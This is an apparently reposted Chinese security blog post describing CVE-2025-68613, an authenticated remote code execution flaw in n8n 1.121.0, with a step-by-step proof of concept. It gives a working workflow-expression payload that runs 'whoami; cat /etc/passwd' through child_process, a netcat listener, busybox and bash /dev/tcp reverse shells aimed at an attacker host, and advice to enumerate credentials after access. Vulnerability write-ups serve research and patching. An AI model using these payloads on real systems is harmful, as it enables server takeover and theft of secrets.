文章总结： CVE-2025-68613是n8n工作流自动化平台1.121.0版本中的已认证远程代码执行漏洞，攻击者可通过构造恶意工作流表达式调用child_process执行系统命令。漏洞利用步骤包括部署漏洞环境、配置注入点、拦截修改请求及建立反向shell，影响涉及敏感数据泄露和服务器控制。建议用户及时升级至安全版本。 综合评分： 82 文章分类： 漏洞分析,WEB安全,应急响应,红队,安全工具

0128.CVE-2025-68613 — n8n 工作流自动化平台中的已认证远程代码执行 (RCE) 漏洞

原创

Bash Overflow Bash Overflow

Rsec

2026年2月10日 16:59 贵州

在小说阅读器读本章

去阅读

本文章仅用网络安全研究学习，请勿使用相关技术进行违法犯罪活动。

声明：本文搬运自互联网，如你是原作者，请联系我们！

类型：CVE-2025-68613

CVE-2025-68613 — n8n 工作流自动化平台中的已认证远程代码执行 (RCE) 漏洞

介绍

n8n 是一个开源的工作流自动化平台，旨在通过可配置的工作流连接应用程序、服务和 API。

它允许用户通过将操作串联起来来自动执行重复性任务，例如触发事件、处理数据、调用外部 API 或执行系统级操作。

由于其灵活性，n8n 通常部署在处理敏感数据、内部集成和运营自动化的环境中。

企业使用 n8n 来简化 DevOps、市场营销、数据管道和内部工具等各个环节的流程。其基于节点的设计使其既方便非开发人员使用，又足以满足高级用户的功能需求。

漏洞概述

CVE-2025-68613 漏洞源于 n8n 内部对工作流执行能力的限制不足。当拥有有效身份验证的用户滥用此漏洞时，他们可以在服务器上执行远程代码。

n8n 假设经过身份验证的用户可以安全地定义或执行工作流，即使某些工作流操作会直接与主机操作系统交互。但在共享或企业级部署中，这一假设不再成立，因为经过身份验证的访问权限并不一定意味着对系统的完全信任。

攻击者的目标是利用合法的工作流程功能来执行任意命令，从而有效地逃脱预期的自动化范围并获得对环境的控制权。

概念验证（PoC）

重现步骤

1. 部署一个存在漏洞的 n8n 实例

• 拉取受影响的 n8n Docker 镜像（版本 1.121.0 ）：

docker pull n8nio/n8n:1.121.0

• 启动容器并暴露本地 Web 界面：

docker run --rm -e "N8N_SECURE_COOKIE=false" -d -p 5678:5678 n8nio/n8n:1.121.0

2. 访问 Web 界面并初始化 n8n

• 在浏览器中打开 n8n 网页用户界面：

http://<your-n8n-webui-ipaddress>:5678/

完成初始账户设置流程。

• 按照环境自定义步骤进行操作。

• 当出现 “免费获取付费功能” 的提示时，选择 “跳过”继续。

3. 创建新工作流程

• 点击 [+] 按钮并选择工作流程。

• 选择 “添加”作为第一步。
• 搜索关键词“ Set” 。
• 选择 “编辑字段（设置）” 来配置新节点。

4. 配置注入点

• 单击“集合”节点内的 “添加字段” 。

• 将输入模式从固定模式切换到表达式模式。

• 插入一个用于执行命令的基本测试有效载荷（例如，读取环境变量）。

5. 使用 Burp Suite 拦截请求

• 触发工作流执行。
• 在 HTTP 历史记录中查找相关的 HTTP 请求。
• 向中继器发送两个请求：

1. One POST request (workflow execution trigger)2. One GET request (execution result retrieval)

• 为了更清晰地表达，请重命名 Repeater 中的请求（POST 和 GET）。

6. 识别并利用注入点

• 修改 POST 请求中的表达式有效负载。
• 注入一个命令来读取系统级信息（例如， whoami 和 /etc/passwd ）。

{{ (function(){var req = this.process.mainModule.require;var execSync = req('child_process').execSync;return execSync('whoami; cat /etc/passwd').toString();})() }

• 发送修改后的 POST 请求。
• 请注意服务器响应中返回的 executionId 。

7. 通过执行 ID 触发命令执行

• 切换到 Repeater 中的 GET 请求。
• 将执行 ID 参数替换为之前返回的值（ID：10）。
• 发送请求以获取执行结果。

8. 建立反向 Shell（Docker/Alpine 环境）

• 在攻击机上启动监听器：

nc -lvnp 31337

• 由于 n8n Docker 镜像使用 Alpine Linux，因此需要利用 busybox 来获取反向 shell：

{{ (function(){var req = this.process.mainModule.require;var&nbsp;exec&nbsp;= req('child_process').exec;&nbsp;return&nbsp;exec('busybox nc <attacker_ip> <attacker_port> -e /bin/sh');})()}}

• 发送修改后的 POST 请求。

9. 非 Docker 系统的替代有效载荷

• 如果目标系统没有运行在 Docker 或 Alpine 容器中，请尝试使用标准的 bash 反向 shell：

/bin/bash&nbsp;-i&nbsp;>&&nbsp;/dev/tcp/<attacker-ip>/<attacker-port>&nbsp;0>&1

10. 利用

• 连接成功后，确认 shell 访问权限。

• 列举 n8n 服务可用的环境、文件、凭据和网络访问权限。

CVE-2025-49144：Notepad++ v8.8.1 安装程序中的权限提升漏洞以及使用 SYSTEM 权限的远程代码执行漏洞

https://osintteam.blog/cve-2025-49144-privilege-escalation-in-notepad-v8-8-1-installer-and-rce-with-system-privileges-c018d79a5f1d

#

影响

• 该漏洞允许已登录的 n8n 用户创建或修改工作流程，从而在服务器上执行任意命令。

• 命令在 n8n 运行时环境中执行，这意味着攻击者可以访问 n8n 服务可用的文件、环境变量和密钥。此外，攻击者还可以获取 API 密钥、数据库凭据和内部服务配置等信息。

  参考

• https://nvd.nist.gov/vuln/detail/CVE-2025-68613

• Critical n8n RCE vulnerability enables full server compromise

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Rsec Bash Overflow Bash Overflow《0128.CVE-2025-68613 — n8n 工作流自动化平台中的已认证远程代码执行 (RCE) 漏洞》